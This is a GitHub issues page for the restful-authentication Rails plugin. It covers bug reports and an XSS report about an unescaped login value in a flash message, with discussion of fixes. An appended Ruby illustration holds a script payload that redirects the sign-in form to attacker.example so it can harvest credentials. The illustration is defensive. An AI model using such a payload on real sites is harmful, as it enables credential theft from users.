technoweenie / restful-authentication
Generates common user authentication code for Rails/Merb, with a full test/unit and rspec suite and optional Acts as State Machine support built-in.
-
Line 40 of note_failed_signin in generators/authenticated/templates/controller.rb
flash[:error] = "Couldn't log you in as '#{params[:login]}'"
is unescaped and could lead to a potential XSS attack where an attacker could steal the user's credentials. It should be:
flash[:error] = "Couldn't log you in as '#{CGI.escapeHTML(params[:login])}'"
Comments
-
Hi, I am pretty new to Rails, although I have been learning it for the past 2 months. I am having trouble using the MySQL database ActiveRecord session store with this plug-in. I keep getting the following error when I try to log in: ActionController::InvalidAuthenticityToken in SessionsController#create. And each time I go to the login page, or any other page for that matter, it creates a new session entry in the sessions table. How can I get the database session store to work properly? I am using Rails 2.3.2.
Any help would be useful!
Comments
-
Hi,
you have missed an issue in the installation instructions: users should add the line "include AuthenticatedSystem" to the application controller. Could you correct it, please?
Comments
-
NoMethodError in UsersController#create
undefined method `name' for #<User:0x23b5400>
This is caused by validations in user.rb for :name since the name field is not part of the initial migration.
validates_format_of :name, :with => Authentication.name_regex, :message => Authentication.bad_name_message, :allow_nil => true
validates_length_of :name, :maximum => 100
Removing these lines fixes the issue.
Comments
-
Am I wrong, or will remember_me never work? In my opinion two lines are missing in the 'by_cookie_token.rb' file (see patch):
Index: restful_authentication/lib/authentication/by_cookie_token.rb
--- restful_authentication/lib/authentication/by_cookie_token.rb +++ restful_authentication/lib/authentication/by_cookie_token.rb @@ -42,8 +42,10 @@
# refresh token (keeping same expires_at) if it exists def refresh_token if remember_token?self.remember_token = self.class.make_tokensave(false)self.remember_token = self.class.make_tokensave(false)else
endremember_me end
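Review bot: as posted, the hunk has lost its +/- markers and line breaks, so it is not possible to tell which of the two identical `self.remember_token = self.class.make_token` / `save(false)` pairs inside `if remember_token?` is the addition and which is the original; please repost the output of `git diff` (or attach the patch file) so the change can be reviewed line by line. Separately, the comment above the method, `# refresh token (keeping same expires_at) if it exists`, no longer describes `refresh_token` if the new `else` branch calls `remember_me`, which issues a token rather than refreshing one; either update that comment or add a spec covering the "no existing remember_token" path so the intended behaviour is pinned down.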
Comments
-
Do you plan on moving restful-authentication to gemcutter?
Comments
-
I just set up restful_auth with the cucumber tests on Rails 2.3.5 and Ruby 1.9 and found that the user step
Then /^she should +see an? (\w+) message '([\w !\']+)'$/ do |notice, message|
  response.should have_flash(notice, %r{#{message}})
end
should be
Then /^she should +see an? (\w+) message '([\w !\']+)'$/ do |notice, message|
  response.should have_flash(notice, :content => %r{#{message}})
end
for things to work. I don't know if something changed recently that would have made this work before but not now, but it all goes back to have_flash, which depends on have_tag, which in turn (so far as I can tell) looks for content if you send in content through a hash. Perhaps it used to treat any second argument as though it were content, but if so it is doing so wonkily now.
Comments
metasoarous
Sat Dec 12 15:38:26 -0800 2009
Okay, I goofed here: sending in %r{#{message}} through hash assignment to the :content key doesn't actually work; that effectively just checks whether or not there is a "div.#{notice}" tag somewhere in the returned HTML. I'm wrestling with a bunch of strange issues and I'll post as I figure more out.
-
removed installation instructions as submodule
0 comments Created 20 days ago by minalecs
Not sure why it was removed, but now it just says
either use git clone git://github.com/technoweenie/restful-authentication.git restful_authentication
or rename the plugin's directory to be restful_authentication after fetching it.
Previously it had instructions to add it as a submodule if using git:
git submodule add git://github.com/technoweenie/restful-authentication.git vendor/plugins/restful_authentication
Comments
Yes-but:
a) you should be escaping your flashes at the view level anyway (rather than trusting to do it on every insertion)
b) h() is easier :-p
c) is there a situation where someone could insert to another user's flash, given that this gets added to the current session? They'd just attack themselves.
Yeah, true, using h() would be easier. I often have my application template display flash error and warn, and escaping them wouldn't be an issue. Some users may not want to escape every flash notice/warn, however.
The way I envisioned an attack using this vulnerability was that an attacker would create a special link on some rogue page. This link would POST to the login page of the vulnerable application. The login parameter would be some JavaScript, which would in turn alter the form's action to point to the attacker's page. The attacker can now collect credentials and, furthermore, devise an attack that does not disrupt service or alert the user in any way.
Hm, interesting attack scenario. Seems unlikely IMO, but also, everything should be prevented.
I think this is more an argument for (a) - you should treat the flash as tainted in your view, and escape or whitelist it appropriately.
However, it certainly doesn't hurt to escape it as you suggest. ;-)
I just come from the school of thought that it should be default, out of the box secure, with no extra user intervention or anything.
It is an easy enough fix as well: one extra method call and the problem is no longer present.
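The following is an added example, not code from restful-authentication or from anyone in this thread. It puts the reported interpolation next to the proposed CGI.escapeHTML fix, and models the view-level h() escaping suggested in the reply, so that both the injection and the double-escaping caveat (escaping at insertion and again in the view) can be seen on one constructed input. MALICIOUS_LOGIN, render_flash and the predicate helpers are all constructed for this illustration; the sample login mimics the form-action-rewriting scenario described above.

```ruby
require 'cgi'
require 'erb'

# Constructed sample input (not from the issue): a login value that closes the
# quoted flash text and rewrites the sign-in form's action, which is the
# credential-theft scenario described in the thread.
MALICIOUS_LOGIN = %q{'><script>document.forms[0].action="https://attacker.example/"</script>}

# As reported: params[:login] is interpolated into the flash unescaped.
def failed_signin_flash_unescaped(login)
  "Couldn't log you in as '#{login}'"
end

# The fix proposed in the issue: escape at insertion time.
def failed_signin_flash_escaped(login)
  "Couldn't log you in as '#{CGI.escapeHTML(login)}'"
end

# Stand-in for a layout that prints the flash (hypothetical helper).
# escape_in_view: true models <%= h flash[:error] %>, as the reply suggests;
# false models a raw <%= flash[:error] %>.
def render_flash(flash_value, escape_in_view:)
  body = escape_in_view ? ERB::Util.html_escape(flash_value) : flash_value
  %(<div class="error">#{body}</div>)
end

# True when the rendered HTML still carries a live <script> element.
def script_injected?(html)
  html.include?('<script')
end

# True when text was escaped twice (an entity's own '&' became '&amp;'), which
# is what happens if you escape at insertion AND in the view: harmless for
# security, but the user sees literal '&lt;' in the message.
def double_escaped?(html)
  html.include?('&amp;')
end

if __FILE__ == $PROGRAM_NAME
  [[false, false], [true, false], [false, true], [true, true]].each do |fixed, view|
    flash = fixed ? failed_signin_flash_escaped(MALICIOUS_LOGIN) : failed_signin_flash_unescaped(MALICIOUS_LOGIN)
    html = render_flash(flash, escape_in_view: view)
    puts "insertion escape=#{fixed} view escape=#{view}: " \
         "injected=#{script_injected?(html)} double_escaped=#{double_escaped?(html)}"
  end
end
```

Either escaping point on its own neutralises the payload; only the unescaped-everywhere combination leaves a working script tag. Applying both escapes the same string twice, which is the practical cost of fixing this in the generator while also following point (a): on Rails 3 and later, where ERB templates escape by default, an insertion-time CGI.escapeHTML will be double-escaped unless the flash value is marked html_safe.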